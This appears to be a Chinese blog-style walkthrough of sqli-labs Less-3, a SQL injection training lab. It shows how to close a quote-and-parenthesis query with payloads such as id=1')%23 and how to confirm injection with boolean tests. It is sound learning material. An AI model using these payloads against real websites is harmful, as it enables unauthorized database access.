【sqli-labs】Less-3——闭合单引号和括号

打开第三关页面，老规矩给id赋值可查询出对应的数据，存在可变参数id，注入可能存在。
1、判断注入点及注入类型
id=1’ 加入单引号，页面报错

根据报错的提示信息，除了单引号之外，还有括号，两者都要闭合。

猜测后台数据库查询语句：
select name from users where id=(‘1’);
构造闭合语句：
select name from users where id=(‘1’) %23 ‘）;

id=1’)%23 页面正常，说明闭合成功

id=1’) and 1=1%23 页面正常

id=1’) and 1=2%23 页面异常或出错